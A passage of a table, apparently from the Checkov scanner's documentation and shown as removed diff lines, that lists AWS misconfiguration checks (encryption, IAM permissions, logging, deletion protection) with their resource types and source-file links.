-|  696 | CKV_AWS_282              | resource                         | aws_redshiftserverless_namespace                                                                 | Ensure that Redshift Serverless namespace is encrypted by KMS using a customer managed key (CMK)                                                                                                         | Terraform               | [RedshiftServerlessNamespaceKMSKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftServerlessNamespaceKMSKey.py)                                                     |
-|  697 | CKV_AWS_283              | data                             | aws_iam_policy_document                                                                          | Ensure no IAM policies documents allow ALL or any AWS principal permissions to the resource                                                                                                              | Terraform               | [IAMPublicActionsPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMPublicActionsPolicy.py)                                                                               |
-|  698 | CKV_AWS_284              | resource                         | aws_sfn_state_machine                                                                            | Ensure State Machine has X-Ray tracing enabled                                                                                                                                                           | Terraform               | [StateMachineXray.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/StateMachineXray.py)                                                                                       |
-|  699 | CKV_AWS_285              | resource                         | aws_sfn_state_machine                                                                            | Ensure State Machine has execution history logging enabled                                                                                                                                               | Terraform               | [StateMachineLoggingExecutionHistory.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/StateMachineLoggingExecutionHistory.py)                                                 |
-|  700 | CKV_AWS_286              | resource                         | aws_iam_group_policy                                                                             | Ensure IAM policies does not allow privilege escalation                                                                                                                                                  | Terraform               | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPrivilegeEscalation.py)                                                                           |
-|  701 | CKV_AWS_286              | resource                         | aws_iam_policy                                                                                   | Ensure IAM policies does not allow privilege escalation                                                                                                                                                  | Terraform               | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPrivilegeEscalation.py)                                                                           |
-|  702 | CKV_AWS_286              | resource                         | aws_iam_role_policy                                                                              | Ensure IAM policies does not allow privilege escalation                                                                                                                                                  | Terraform               | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPrivilegeEscalation.py)                                                                           |
-|  703 | CKV_AWS_286              | resource                         | aws_iam_user_policy                                                                              | Ensure IAM policies does not allow privilege escalation                                                                                                                                                  | Terraform               | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPrivilegeEscalation.py)                                                                           |
-|  704 | CKV_AWS_286              | resource                         | aws_ssoadmin_permission_set_inline_policy                                                        | Ensure IAM policies does not allow privilege escalation                                                                                                                                                  | Terraform               | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPrivilegeEscalation.py)                                                                           |
-|  705 | CKV_AWS_287              | resource                         | aws_iam_group_policy                                                                             | Ensure IAM policies does not allow credentials exposure                                                                                                                                                  | Terraform               | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMCredentialsExposure.py)                                                                           |
-|  706 | CKV_AWS_287              | resource                         | aws_iam_policy                                                                                   | Ensure IAM policies does not allow credentials exposure                                                                                                                                                  | Terraform               | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMCredentialsExposure.py)                                                                           |
-|  707 | CKV_AWS_287              | resource                         | aws_iam_role_policy                                                                              | Ensure IAM policies does not allow credentials exposure                                                                                                                                                  | Terraform               | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMCredentialsExposure.py)                                                                           |
-|  708 | CKV_AWS_287              | resource                         | aws_iam_user_policy                                                                              | Ensure IAM policies does not allow credentials exposure                                                                                                                                                  | Terraform               | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMCredentialsExposure.py)                                                                           |
-|  709 | CKV_AWS_287              | resource                         | aws_ssoadmin_permission_set_inline_policy                                                        | Ensure IAM policies does not allow credentials exposure                                                                                                                                                  | Terraform               | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMCredentialsExposure.py)                                                                           |
-|  710 | CKV_AWS_288              | resource                         | aws_iam_group_policy                                                                             | Ensure IAM policies does not allow data exfiltration                                                                                                                                                     | Terraform               | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMDataExfiltration.py)                                                                                 |
-|  711 | CKV_AWS_288              | resource                         | aws_iam_policy                                                                                   | Ensure IAM policies does not allow data exfiltration                                                                                                                                                     | Terraform               | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMDataExfiltration.py)                                                                                 |
-|  712 | CKV_AWS_288              | resource                         | aws_iam_role_policy                                                                              | Ensure IAM policies does not allow data exfiltration                                                                                                                                                     | Terraform               | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMDataExfiltration.py)                                                                                 |
-|  713 | CKV_AWS_288              | resource                         | aws_iam_user_policy                                                                              | Ensure IAM policies does not allow data exfiltration                                                                                                                                                     | Terraform               | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMDataExfiltration.py)                                                                                 |
-|  714 | CKV_AWS_288              | resource                         | aws_ssoadmin_permission_set_inline_policy                                                        | Ensure IAM policies does not allow data exfiltration                                                                                                                                                     | Terraform               | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMDataExfiltration.py)                                                                                 |
-|  715 | CKV_AWS_289              | resource                         | aws_iam_group_policy                                                                             | Ensure IAM policies does not allow permissions management / resource exposure without constraints                                                                                                        | Terraform               | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPermissionsManagement.py)                                                                       |
-|  716 | CKV_AWS_289              | resource                         | aws_iam_policy                                                                                   | Ensure IAM policies does not allow permissions management / resource exposure without constraints                                                                                                        | Terraform               | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPermissionsManagement.py)                                                                       |
-|  717 | CKV_AWS_289              | resource                         | aws_iam_role_policy                                                                              | Ensure IAM policies does not allow permissions management / resource exposure without constraints                                                                                                        | Terraform               | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPermissionsManagement.py)                                                                       |
-|  718 | CKV_AWS_289              | resource                         | aws_iam_user_policy                                                                              | Ensure IAM policies does not allow permissions management / resource exposure without constraints                                                                                                        | Terraform               | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPermissionsManagement.py)                                                                       |
-|  719 | CKV_AWS_289              | resource                         | aws_ssoadmin_permission_set_inline_policy                                                        | Ensure IAM policies does not allow permissions management / resource exposure without constraints                                                                                                        | Terraform               | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPermissionsManagement.py)                                                                       |
-|  720 | CKV_AWS_290              | resource                         | aws_iam_group_policy                                                                             | Ensure IAM policies does not allow write access without constraints                                                                                                                                      | Terraform               | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMWriteAccess.py)                                                                                           |
-|  721 | CKV_AWS_290              | resource                         | aws_iam_policy                                                                                   | Ensure IAM policies does not allow write access without constraints                                                                                                                                      | Terraform               | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMWriteAccess.py)                                                                                           |
-|  722 | CKV_AWS_290              | resource                         | aws_iam_role_policy                                                                              | Ensure IAM policies does not allow write access without constraints                                                                                                                                      | Terraform               | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMWriteAccess.py)                                                                                           |
-|  723 | CKV_AWS_290              | resource                         | aws_iam_user_policy                                                                              | Ensure IAM policies does not allow write access without constraints                                                                                                                                      | Terraform               | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMWriteAccess.py)                                                                                           |
-|  724 | CKV_AWS_290              | resource                         | aws_ssoadmin_permission_set_inline_policy                                                        | Ensure IAM policies does not allow write access without constraints                                                                                                                                      | Terraform               | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMWriteAccess.py)                                                                                           |
-|  725 | CKV_AWS_291              | resource                         | aws_msk_cluster                                                                                  | Ensure MSK nodes are private                                                                                                                                                                             | Terraform               | [MSKClusterNodesArePrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MSKClusterNodesArePrivate.py)                                                                     |
-|  726 | CKV_AWS_292              | resource                         | aws_docdb_global_cluster                                                                         | Ensure DocumentDB Global Cluster is encrypted at rest (default is unencrypted)                                                                                                                           | Terraform               | [DocDBGlobalClusterEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBGlobalClusterEncryption.py)                                                               |
-|  727 | CKV_AWS_293              | resource                         | aws_db_instance                                                                                  | Ensure that AWS database instances have deletion protection enabled                                                                                                                                      | Terraform               | [RDSInstanceDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSInstanceDeletionProtection.py)                                                             |
-|  728 | CKV_AWS_294              | resource                         | aws_cloudtrail_event_data_store                                                                  | Ensure CloudTrail Event Data Store uses CMK                                                                                                                                                              | Terraform               | [CloudtrailEventDataStoreUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudtrailEventDataStoreUsesCMK.py)                                                         |
-|  729 | CKV_AWS_295              | resource                         | aws_datasync_location_object_storage                                                             | Ensure DataSync Location Object Storage doesn't expose secrets                                                                                                                                           | Terraform               | [DatasyncLocationExposesSecrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DatasyncLocationExposesSecrets.py)                                                           |
-|  730 | CKV_AWS_296              | resource                         | aws_dms_endpoint                                                                                 | Ensure DMS endpoint uses Customer Managed Key (CMK)                                                                                                                                                      | Terraform               | [DMSEndpointUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DMSEndpointUsesCMK.py)                                                                                   |
-|  731 | CKV_AWS_297              | resource                         | aws_scheduler_schedule                                                                           | Ensure EventBridge Scheduler Schedule uses Customer Managed Key (CMK)                                                                                                                                    | Terraform               | [SchedulerScheduleUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SchedulerScheduleUsesCMK.py)                                                                       |
-|  732 | CKV_AWS_298              | resource                         | aws_dms_s3_endpoint                                                                              | Ensure DMS S3 uses Customer Managed Key (CMK)                                                                                                                                                            | Terraform               | [DMSS3UsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DMSS3UsesCMK.py)                                                                                               |
-|  733 | CKV_AWS_300              | resource                         | aws_s3_bucket_lifecycle_configuration                                                            | Ensure S3 lifecycle configuration sets period for aborting failed uploads                                                                                                                                | Terraform               | [S3AbortIncompleteUploads.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3AbortIncompleteUploads.py)                                                                       |
-|  734 | CKV_AWS_301              | resource                         | aws_lambda_permission                                                                            | Ensure that AWS Lambda function is not publicly accessible                                                                                                                                               | Terraform               | [LambdaFunctionIsNotPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaFunctionIsNotPublic.py)                                                                     |
-|  735 | CKV_AWS_302              | resource                         | aws_db_snapshot                                                                                  | Ensure DB Snapshots are not Public                                                                                                                                                                       | Terraform               | [DBSnapshotsArePrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBSnapshotsArePrivate.py)                                                                             |
-|  736 | CKV_AWS_303              | resource                         | aws_ssm_document                                                                                 | Ensure SSM documents are not Public                                                                                                                                                                      | Terraform               | [SSMDocumentsArePrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SSMDocumentsArePrivate.py)                                                                           |
-|  737 | CKV_AWS_304              | resource                         | aws_secretsmanager_secret_rotation                                                               | Ensure Secrets Manager secrets should be rotated within 90 days                                                                                                                                          | Terraform               | [SecretManagerSecret90days.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecretManagerSecret90days.py)                                                                     |
-|  738 | CKV_AWS_305              | resource                         | aws_cloudfront_distribution                                                                      | Ensure CloudFront distribution has a default root object configured                                                                                                                                      | Terraform               | [CloudfrontDistributionDefaultRoot.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudfrontDistributionDefaultRoot.py)                                                     |
-|  739 | CKV_AWS_306              | resource                         | aws_sagemaker_notebook_instance                                                                  | Ensure SageMaker notebook instances should be launched into a custom VPC                                                                                                                                 | Terraform               | [SagemakerNotebookInCustomVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerNotebookInCustomVPC.py)                                                               |
-|  740 | CKV_AWS_307              | resource                         | aws_sagemaker_notebook_instance                                                                  | Ensure SageMaker Users should not have root access to SageMaker notebook instances                                                                                                                       | Terraform               | [SagemakerNotebookRoot.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerNotebookRoot.py)                                                                             |
-|  741 | CKV_AWS_308              | resource                         | aws_api_gateway_method_settings                                                                  | Ensure API Gateway method setting caching is set to encrypted                                                                                                                                            | Terraform               | [APIGatewayMethodSettingsCacheEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayMethodSettingsCacheEncrypted.py)                                           |
-|  742 | CKV_AWS_309              | resource                         | aws_apigatewayv2_route                                                                           | Ensure API GatewayV2 routes specify an authorization type                                                                                                                                                | Terraform               | [APIGatewayV2RouteDefinesAuthorizationType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayV2RouteDefinesAuthorizationType.py)                                     |
-|  743 | CKV_AWS_310              | resource                         | aws_cloudfront_distribution                                                                      | Ensure CloudFront distributions should have origin failover configured                                                                                                                                   | Terraform               | [CloudfrontDistributionOriginFailover.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudfrontDistributionOriginFailover.py)                                               |
-|  744 | CKV_AWS_311              | resource                         | aws_codebuild_project                                                                            | Ensure that CodeBuild S3 logs are encrypted                                                                                                                                                              | Terraform               | [CodebuildS3LogsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodebuildS3LogsEncrypted.py)                                                                       |
-|  745 | CKV_AWS_312              | resource                         | aws_elastic_beanstalk_environment                                                                | Ensure Elastic Beanstalk environments have enhanced health reporting enabled                                                                                                                             | Terraform               | [ElasticBeanstalkUseEnhancedHealthChecks.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticBeanstalkUseEnhancedHealthChecks.py)                                         |
-|  746 | CKV_AWS_313              | resource                         | aws_rds_cluster                                                                                  | Ensure RDS cluster configured to copy tags to snapshots                                                                                                                                                  | Terraform               | [RDSClusterCopyTags.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterCopyTags.py)                                                                                   |
-|  747 | CKV_AWS_314              | resource                         | aws_codebuild_project                                                                            | Ensure CodeBuild project environments have a logging configuration                                                                                                                                       | Terraform               | [CodebuildHasLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodebuildHasLogs.py)                                                                                       |
-|  748 | CKV_AWS_315              | resource                         | aws_autoscaling_group                                                                            | Ensure EC2 Auto Scaling groups use EC2 launch templates                                                                                                                                                  | Terraform               | [AutoScalingLaunchTemplate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AutoScalingLaunchTemplate.py)                                                                     |
-|  749 | CKV_AWS_316              | resource                         | aws_codebuild_project                                                                            | Ensure CodeBuild project environments do not have privileged mode enabled                                                                                                                                | Terraform               | [CodeBuildPrivilegedMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodeBuildPrivilegedMode.py)                                                                         |
-|  750 | CKV_AWS_317              | resource                         | AWS::Elasticsearch::Domain                                                                       | Ensure Elasticsearch Domain Audit Logging is enabled                                                                                                                                                     | Cloudformation          | [ElasticsearchDomainAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainAuditLogging.py)                                                    |
-|  751 | CKV_AWS_317              | resource                         | AWS::OpenSearchService::Domain                                                                   | Ensure Elasticsearch Domain Audit Logging is enabled                                                                                                                                                     | Cloudformation          | [ElasticsearchDomainAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainAuditLogging.py)                                                    |
-|  752 | CKV_AWS_317              | resource                         | aws_elasticsearch_domain                                                                         | Ensure Elasticsearch Domain Audit Logging is enabled                                                                                                                                                     | Terraform               | [ElasticsearchDomainAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainAuditLogging.py)                                                         |
-|  753 | CKV_AWS_317              | resource                         | aws_opensearch_domain                                                                            | Ensure Elasticsearch Domain Audit Logging is enabled                                                                                                                                                     | Terraform               | [ElasticsearchDomainAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainAuditLogging.py)                                                         |
-|  754 | CKV_AWS_318              | resource                         | aws_elasticsearch_domain                                                                         | Ensure Elasticsearch domains are configured with at least three dedicated master nodes for HA                                                                                                            | Terraform               | [ElasticsearchDomainHA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainHA.py)                                                                             |
-|  755 | CKV_AWS_318              | resource                         | aws_opensearch_domain                                                                            | Ensure Elasticsearch domains are configured with at least three dedicated master nodes for HA                                                                                                            | Terraform               | [ElasticsearchDomainHA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainHA.py)                                                                             |
-|  756 | CKV_AWS_319              | resource                         | aws_cloudwatch_metric_alarm                                                                      | Ensure that CloudWatch alarm actions are enabled                                                                                                                                                         | Terraform               | [CloudWatchAlarmsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudWatchAlarmsEnabled.py)                                                                         |
-|  757 | CKV_AWS_320              | resource                         | aws_redshift_cluster                                                                             | Ensure Redshift clusters do not use the default database name                                                                                                                                            | Terraform               | [RedshiftClusterDatabaseName.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterDatabaseName.py)                                                                 |
-|  758 | CKV_AWS_321              | resource                         | aws_redshift_cluster                                                                             | Ensure Redshift clusters use enhanced VPC routing                                                                                                                                                        | Terraform               | [RedshiftClusterUseEnhancedVPCRouting.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterUseEnhancedVPCRouting.py)                                               |
-|  759 | CKV_AWS_322              | resource                         | aws_elasticache_cluster                                                                          | Ensure ElastiCache for Redis cache clusters have auto minor version upgrades enabled                                                                                                                     | Terraform               | [ElasticCacheAutomaticMinorUpgrades.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticCacheAutomaticMinorUpgrades.py)                                                   |
-|  760 | CKV_AWS_323              | resource                         | aws_elasticache_cluster                                                                          | Ensure ElastiCache clusters do not use the default subnet group                                                                                                                                          | Terraform               | [ElastiCacheHasCustomSubnet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElastiCacheHasCustomSubnet.py)                                                                   |
-|  761 | CKV_AWS_324              | resource                         | aws_rds_cluster                                                                                  | Ensure that RDS Cluster log capture is enabled                                                                                                                                                           | Terraform               | [RDSClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterLogging.py)                                                                                     |
-|  762 | CKV_AWS_325              | resource                         | aws_rds_cluster                                                                                  | Ensure that RDS Cluster audit logging is enabled for MySQL engine                                                                                                                                        | Terraform               | [RDSClusterAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterAuditLogging.py)                                                                           |
-|  763 | CKV_AWS_326              | resource                         | aws_rds_cluster                                                                                  | Ensure that RDS Aurora Clusters have backtracking enabled                                                                                                                                                | Terraform               | [RDSClusterAuroraBacktrack.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterAuroraBacktrack.py)                                                                     |
-|  764 | CKV_AWS_327              | resource                         | aws_rds_cluster                                                                                  | Ensure RDS Clusters are encrypted using KMS CMKs                                                                                                                                                         | Terraform               | [RDSClusterEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterEncryptedWithCMK.py)                                                                   |
-|  765 | CKV_AWS_328              | resource                         | aws_alb                                                                                          | Ensure that ALB is configured with defensive or strictest desync mitigation mode                                                                                                                         | Terraform               | [ALBDesyncMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBDesyncMode.py)                                                                                             |
-|  766 | CKV_AWS_328              | resource                         | aws_elb                                                                                          | Ensure that ALB is configured with defensive or strictest desync mitigation mode                                                                                                                         | Terraform               | [ALBDesyncMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBDesyncMode.py)                                                                                             |
-|  767 | CKV_AWS_328              | resource                         | aws_lb                                                                                           | Ensure that ALB is configured with defensive or strictest desync mitigation mode                                                                                                                         | Terraform               | [ALBDesyncMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBDesyncMode.py)                                                                                             |
-|  768 | CKV_AWS_329              | resource                         | aws_efs_access_point                                                                             | EFS access points should enforce a root directory                                                                                                                                                        | Terraform               | [EFSAccessPointRoot.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EFSAccessPointRoot.py)                                                                                   |
-|  769 | CKV_AWS_330              | resource                         | aws_efs_access_point                                                                             | EFS access points should enforce a user identity                                                                                                                                                         | Terraform               | [EFSAccessUserIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EFSAccessUserIdentity.py)                                                                             |
-|  770 | CKV_AWS_331              | resource                         | aws_ec2_transit_gateway                                                                          | Ensure Transit Gateways do not automatically accept VPC attachment requests                                                                                                                              | Terraform               | [Ec2TransitGatewayAutoAccept.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/Ec2TransitGatewayAutoAccept.py)                                                                 |
-|  771 | CKV_AWS_332              | resource                         | aws_ecs_service                                                                                  | Ensure ECS Fargate services run on the latest Fargate platform version                                                                                                                                   | Terraform               | [ECSServiceFargateLatest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSServiceFargateLatest.py)                                                                         |
-|  772 | CKV_AWS_333              | resource                         | aws_ecs_service                                                                                  | Ensure ECS services do not have public IP addresses assigned to them automatically                                                                                                                       | Terraform               | [ECSServicePublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSServicePublicIP.py)                                                                                   |
-|  773 | CKV_AWS_334              | resource                         | aws_ecs_task_definition                                                                          | Ensure ECS containers should run as non-privileged                                                                                                                                                       | Terraform               | [ECSContainerPrivilege.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSContainerPrivilege.py)                                                                             |
-|  774 | CKV_AWS_335              | resource                         | aws_ecs_task_definition                                                                          | Ensure ECS task definitions should not share the host's process namespace                                                                                                                                | Terraform               | [ECSContainerHostProcess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSContainerHostProcess.py)                                                                         |
-|  775 | CKV_AWS_336              | resource                         | aws_ecs_task_definition                                                                          | Ensure ECS containers are limited to read-only access to root filesystems                                                                                                                                | Terraform               | [ECSContainerReadOnlyRoot.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSContainerReadOnlyRoot.py)                                                                       |
-|  776 | CKV_AWS_337              | resource                         | aws_ssm_parameter                                                                                | Ensure SSM parameters are using KMS CMK                                                                                                                                                                  | Terraform               | [SSMParameterUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SSMParameterUsesCMK.py)                                                                                 |
-|  777 | CKV_AWS_338              | resource                         | aws_cloudwatch_log_group                                                                         | Ensure CloudWatch log groups retains logs for at least 1 year                                                                                                                                            | Terraform               | [CloudWatchLogGroupRetentionYear.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudWatchLogGroupRetentionYear.py)                                                         |
-|  778 | CKV_AWS_339              | resource                         | aws_eks_cluster                                                                                  | Ensure EKS clusters run on a supported Kubernetes version                                                                                                                                                | Terraform               | [EKSPlatformVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EKSPlatformVersion.py)                                                                                   |
-|  779 | CKV_AWS_340              | resource                         | aws_elastic_beanstalk_environment                                                                | Ensure Elastic Beanstalk managed platform updates are enabled                                                                                                                                            | Terraform               | [ElasticBeanstalkUseManagedUpdates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticBeanstalkUseManagedUpdates.py)                                                     |
-|  780 | CKV_AWS_341              | resource                         | aws_launch_configuration                                                                         | Ensure Launch template should not have a metadata response hop limit greater than 1                                                                                                                      | Terraform               | [LaunchTemplateMetadataHop.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LaunchTemplateMetadataHop.py)                                                                     |
-|  781 | CKV_AWS_341              | resource                         | aws_launch_template                                                                              | Ensure Launch template should not have a metadata response hop limit greater than 1                                                                                                                      | Terraform               | [LaunchTemplateMetadataHop.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LaunchTemplateMetadataHop.py)                                                                     |
-|  782 | CKV_AWS_342              | resource                         | aws_waf_rule_group                                                                               | Ensure WAF rule has any actions                                                                                                                                                                          | Terraform               | [WAFRuleHasAnyActions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py)                                                                               |
-|  783 | CKV_AWS_342              | resource                         | aws_waf_web_acl                                                                                  | Ensure WAF rule has any actions                                                                                                                                                                          | Terraform               | [WAFRuleHasAnyActions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py)                                                                               |
-|  784 | CKV_AWS_342              | resource                         | aws_wafregional_rule_group                                                                       | Ensure WAF rule has any actions                                                                                                                                                                          | Terraform               | [WAFRuleHasAnyActions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py)                                                                               |
-|  785 | CKV_AWS_342              | resource                         | aws_wafregional_web_acl                                                                          | Ensure WAF rule has any actions                                                                                                                                                                          | Terraform               | [WAFRuleHasAnyActions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py)                                                                               |
-|  786 | CKV_AWS_342              | resource                         | aws_wafv2_rule_group                                                                             | Ensure WAF rule has any actions                                                                                                                                                                          | Terraform               | [WAFRuleHasAnyActions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py)                                                                               |
-|  787 | CKV_AWS_342              | resource                         | aws_wafv2_web_acl                                                                                | Ensure WAF rule has any actions                                                                                                                                                                          | Terraform               | [WAFRuleHasAnyActions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py)                                                                               |
-|  788 | CKV_AWS_343              | resource                         | aws_redshift_cluster                                                                             | Ensure Amazon Redshift clusters should have automatic snapshots enabled                                                                                                                                  | Terraform               | [RedshiftClusterAutoSnap.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterAutoSnap.py)                                                                         |
-|  789 | CKV_AWS_344              | resource                         | aws_networkfirewall_firewall                                                                     | Ensure that Network firewalls have deletion protection enabled                                                                                                                                           | Terraform               | [NetworkFirewallDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkFirewallDeletionProtection.py)                                                     |
-|  790 | CKV_AWS_345              | resource                         | aws_networkfirewall_firewall                                                                     | Ensure that Network firewall encryption is via a CMK                                                                                                                                                     | Terraform               | [NetworkFirewallUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkFirewallUsesCMK.py)                                                                           |
